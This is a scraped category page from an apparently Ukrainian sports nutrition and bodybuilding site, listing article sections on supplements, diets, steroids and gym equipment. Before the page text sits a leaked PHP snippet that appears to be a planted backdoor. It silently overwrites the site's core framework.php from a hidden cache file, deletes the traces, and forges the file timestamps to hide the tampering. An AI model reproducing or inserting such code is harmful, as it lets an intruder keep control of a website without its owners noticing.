$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } статті | Спортивне харчування - успіх у бодібілдингу та пауерліфтингу

статті

 • СПОРТИВНЕ ХАРЧУВАННЯ   ( 19 Статті )
  спортивне харчування

  Сучасний ринок спортивного харчування пропонує широкий асортимент  різноманітних добавок. В цьому розділі зібрані статті про правила прийому, ефекти від прийому, побічні дії, специфіку різних спортивних добавок таких як креатин, протеїн, глютамін, амінокислоти, жироспалювачі, потенцери і т.д.  
  Таке різноманіття різнокольорових баночек може поставити в "складне положення" навіть професіонала, а не тільки початківця.

 • ЗДОРОВИЙ СПОСІБ ЖИТТЯ - ХАРЧУВАННЯ   ( 18 Статті )
  Здоровий спосіб життя це ключ до довголіття та стійкості хворобам. Харчування один з найголовніших факторів відмінного стану здоровя та самопочуття. Але часто про харчування замислюються лише тоді коли вже добряче "прижме". Хоча дотримання простих правил в домашноьму куховарстві вже согодні, може вберегти вас від великих проблем зі здоровям в майбутньому.
  "Адже ми те - що ми їмо..."
  здорове зарчування для всіх

   

 • БОДІБІЛДІНГ   ( 11 Статті )
  Бодібілдінг

  Статті про бодібілдінг як спорт. Різні статті про бодібілдерів, сучасні методики тренувань для досягнення гарного та сильного тіла. Огляди методів схуднення та набору ваги.

   

   

   

 • СТЕРОЇДИ   ( 26 Статті )

  Статті про стероїди (анаболіки). Статті про побічні ефекти, про рекомендоване дозування різних препаратів. Опис ефектів від прийму того, чи іншого стероїду. Конкретні рекомендації щодо прийому конкретних анаболіків.

   


  Анаболіки

 • ЕФЕКТИВНІ ДІЄТИ. СХУДНЕННЯ   ( 9 Статті )

  catdietОгляд найбільш популярних та ефективних дієт. Допоможе обрати
  оптимальну дієту саме для Вас.

   

   

   

   

   

   

 • ТРЕНАЖЕРИ   ( 1 Стаття )
  trenageryСтатті про тренажери. Характеристики тренажерів. Поради при покупці та експлуатації тренажерів. Особливості користування тренажерів.
  Все, що пов'язано з тренажерами
Статті